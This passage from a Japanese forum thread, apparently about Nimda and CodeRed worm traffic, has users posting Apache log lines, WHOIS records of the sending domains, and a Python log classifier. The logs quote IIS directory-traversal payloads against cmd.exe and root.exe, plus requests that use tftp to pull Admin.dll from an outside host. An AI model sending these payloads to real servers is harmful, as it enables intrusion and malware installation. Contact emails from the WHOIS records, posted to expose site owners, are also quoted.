>>66 How about something like logresolve?
logresolve is a post-processing program to resolve IP-addresses in Apache's access logfiles. To minimize impact on your nameserver, logresolve has its very own internal hash-table cache. This means that each IP number will only be looked up the first time it is found in the log file.
I got hits from a place like this, too.
Domain Information: [ドメイン情報]
a. [ドメイン名] IISR.GR.JP
e. [そしきめい] いんたーねっとじょうほうせんりゃくけんきゅうしょ
f. [組織名] インターネット情報戦略研究所
g. [Organization] Internet Information Strategy Research Institute
k. [組織種別] 任意団体
l. [Organization Type] Group
m. [登録担当者] SA1256JP
n. [技術連絡担当者] SA1256JP
p. [ネームサーバ] ns1.iisr.gr.jp
p. [ネームサーバ] ns1.nava21.ne.jp
p. [ネームサーバ] ns3.nava21.ne.jp
y. [通知アドレス] asano@iisr.gr.jp
[状態] Connected (2002/03/31)
[登録年月日] 2000/10/03
[接続年月日] 2000/10/30
[最終更新] 2001/03/19 16:05:44 (JST) n-nakako@nava21.co.jp
74 :
This one has a nice name (・∀・) Nimda attack exposure
Domain Information: [ドメイン情報]
a. [ドメイン名] KIDDYLAND.CO.JP
e. [そしきめい] かぶしきがいしゃきでいらんど
f. [組織名] 株式会社 キデイランド
g. [Organization] KIDDY LAND CO.,LTD
k. [組織種別] 株式会社
l. [Organization Type] Corporation
m. [登録担当者] SA235JP
n. [技術連絡担当者] KS1250JP
p. [ネームサーバ] ns.kiddyland.co.jp
p. [ネームサーバ] s-field1.sunfield.ne.jp
y. [通知アドレス] nsp-addr@sunfield.ne.jp
[状態] Connected (2002/03/31)
[登録年月日] 1997/12/02
[接続年月日] 1998/02/02
[最終更新] 2000/02/14 09:51:41 (JST) nsp-addr@sunfield.ne.jp
I got so fed up with this that I'm exposing one too.
203.141.185.132 - - [18/Sep/2001:22:27:17 +0900] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 282
Domain Information: [ドメイン情報]
a. [ドメイン名] OFFICETOKYO.CO.JP
e. [そしきめい]
f. [組織名] 東京事務所有限会社
g. [Organization] TOKYO JIMUSHO Co.,Ltd.
k. [組織種別] 有限会社
l. [Organization Type] Company
m. [登録担当者] TF198JP
n. [技術連絡担当者] TF198JP
p. [ネームサーバ] dns1.officetokyo.co.jp
p. [ネームサーバ] mars.kcom.ne.jp
y. [通知アドレス]
[状態] Connected (2002/03/31)
[登録年月日] 1997/03/28
[接続年月日] 1997/04/15
[最終更新] 1998/06/09 19:04:59 (JST) Sunabe@kddcom.co.jp
"Huh, CodeBlue, eh..." I thought, and when I looked at my Apache logs,
GET /scripts/root.exe?/c+dir HTTP/1.0" 404 276 "-" "-"
GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 274 "-" "-"
GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 284 "-" "-"
GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 284 "-" "-"
GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298 "-" "-"
GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 315 "-" "-"
GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 315 "-" "-"
GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 331 "-" "-"
GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297 "-" "-"
GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297 "-" "-"
GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297 "-" "-"
GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297 "-" "-"
GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 281 "-" "-"
GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 281 "-" "-"
GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298 "-" "-"
GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298 "-" "-"
they were packed solid with these. Just when I thought CodeRed had finally settled down... Actually, I get the feeling that far more of these are coming in than at the height of CodeRed.
82 :
>>63 If /c/winnt/system32/cmd.exe exists, you get 4 more hits:
GET /c/winnt/system32/cmd.exe?/c+tftp%20-i%20210.145.120*%20GET%20Admin.dll%20c:\Admin.dll HTTP/1.0
GET /c/winnt/system32/cmd.exe?/c+tftp%20-i%20210.145.120*%20GET%20Admin.dll%20d:\Admin.dll HTTP/1.0
GET /c/winnt/system32/cmd.exe?/c+tftp%20-i%20210.145.120*%20GET%20Admin.dll%20e:\Admin.dll HTTP/1.0
GET /c/Admin.dll HTTP/1.0
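
The request lists posted above differ mainly in how the path separator is encoded, so a log filter has to decode before it matches. The following is an added example, not code from any poster in this thread: it percent-decodes each request target until the result is stable, folds the overlong separator forms, and counts labelled requests per client. The label names, the sample lines and the 192.0.2.x addresses are constructed for illustration.

```python
import re
from collections import Counter
from urllib.parse import unquote_to_bytes

# Client address and request target of an Apache common/combined log line.
LINE = re.compile(r'^(\S+) .*?"(?:GET|HEAD|POST) (\S+) HTTP/\d\.\d"')
# Overlong/malformed UTF-8 forms of '/' and backslash seen in the posted requests.
OVERLONG = re.compile(rb"\xc0\x2f|\xc0\xaf|\xc1\x1c|\xc1\x9c")

def normalize(target, max_rounds=4):
    """Percent-decode until stable (%255c -> %5c -> backslash), fold separators."""
    data = target.encode("latin-1", "replace")
    for _ in range(max_rounds):
        decoded = unquote_to_bytes(data)
        if decoded == data:
            break
        data = decoded
    data = OVERLONG.sub(b"/", data).replace(b"\\", b"/")
    return data.decode("latin-1").lower()

def classify(target):
    """Label one request target; None means it matches none of the patterns."""
    path, _, query = normalize(target).partition("?")
    if path.endswith("/cmd.exe") and "tftp" in query and "admin.dll" in query:
        return "tftp-download"
    if path.endswith(("/cmd.exe", "/root.exe")):
        return "traversal-probe" if "../" in path else "direct-probe"
    if path.endswith("/admin.dll"):
        return "payload-request"
    return None

def summarize(lines):
    """Count labelled requests per (client, label) over access-log lines."""
    hits = Counter()
    for line in lines:
        m = LINE.match(line)
        label = classify(m.group(2)) if m else None
        if label:
            hits[(m.group(1), label)] += 1
    return hits

# Constructed sample: targets follow the posts above, addresses are placeholders.
SAMPLE = [
    r'192.0.2.10 - - [18/Sep/2001:22:27:17 +0900] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 282',
    r'192.0.2.10 - - [18/Sep/2001:22:27:18 +0900] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298',
    r'192.0.2.10 - - [18/Sep/2001:22:27:19 +0900] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 281',
    r'192.0.2.10 - - [18/Sep/2001:22:27:20 +0900] "GET /c/winnt/system32/cmd.exe?/c+tftp%20-i%20192.0.2.1%20GET%20Admin.dll%20c:\Admin.dll HTTP/1.0" 404 284',
    r'192.0.2.20 - - [18/Sep/2001:22:27:21 +0900] "GET /index.html HTTP/1.0" 200 1024',
]
```

Matching on the normalized path rather than on the raw string is what lets one rule cover the `%255c`, `%%35c` and `%c0%af` variants alike.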